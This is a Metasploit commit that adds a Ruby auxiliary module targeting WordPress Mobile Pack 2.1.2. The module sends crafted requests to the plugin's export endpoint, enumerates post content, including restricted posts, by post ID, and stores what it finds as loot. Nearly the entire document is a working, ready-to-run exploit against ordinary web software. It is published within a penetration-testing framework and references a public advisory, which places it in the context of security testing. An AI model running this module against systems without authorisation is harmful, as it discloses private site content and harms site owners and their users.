Land #5807, Added Module WP Mobile Pack Vuln

bug/bundler_fix
wchen-r7 2015-08-28 13:43:00 -05:00
commit 3d4cb06c67
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 85 additions and 0 deletions

View File

@ -0,0 +1,85 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Mobile Pack Information Disclosure Vulnerability',
'Description' => %q{
This module exploits an information disclosure vulnerability in WordPress Plugin
"WP Mobile Pack" version 2.1.2, allowing to read files with privileges
information.
},
'References' =>
[
['WPVDB', '8107'],
['URL', 'https://packetstormsecurity.com/files/132750/']
],
'Author' =>
[
'Nitin Venkatesh', # Vulnerability Discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('POSTID', [true, 'The post identification to read', '1'])
], self.class)
end
def check
check_plugin_version_from_readme('wordpress-mobile-pack', '2.1.3')
end
def run_host(ip)
postid = datastore['POSTID']
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'),
'vars_get' => {
'content' => 'exportarticle',
'callback' => 'exportarticle',
'articleId' => "#{postid}"
}
)
temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, ""))
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e
print_error("#{peer} - The following Error was encountered: #{e.class}")
return
end
if res &&
res.code == 200 &&
res.body.length > 29 &&
res.headers['Content-Type'].include?('application/json') &&
!res.body.include?('"error":')
vprint_status('Enumerating...')
res_clean = JSON.pretty_generate(temp)
vprint_good("Found:\n\n#{res_clean}\n")
path = store_loot(
'mobilepack.disclosure',
'text/plain',
ip,
res_clean
)
print_good("#{peer} - File saved in: #{path}")
else
print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.")
end
end
end